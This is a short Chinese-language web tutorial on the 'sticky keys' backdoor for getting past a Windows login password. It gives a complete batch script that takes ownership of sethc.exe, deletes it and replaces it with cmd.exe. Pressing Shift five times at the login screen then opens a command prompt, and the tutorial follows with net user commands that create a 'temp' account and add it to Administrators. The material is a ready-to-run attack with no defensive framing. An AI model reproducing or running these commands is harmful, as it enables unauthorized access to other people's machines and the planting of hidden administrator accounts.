shift后门,绕过windows开机密码

2025-11-21 05:53:01

1、创建bat文件

2、编写以下代码

@echo off

cd\

cd Windows\System32

takeown /f sethc.exe /a

icacls sethc.exe /grant Administrator:f

del sethc.exe

copy cmd.exe sethc.exe

pause&&exit

保存退出

3、运行bat

4、在登陆界面连续按shift五次，cmd就会弹出来。

5、在dos命令运行以下代码创建账号

创建账号： net user temp /add

提权： net localgroup Administrators temp /add

随后重启，就会出现temp的用户，点击登陆进去就可以了。

删除用户: net user temp /del

声明：本网站引用、摘录或转载内容仅供网站访问者交流或参考，不代表本站立场，如存在版权或非法内容，请联系站长删除，联系邮箱：site.kefu@qq.com。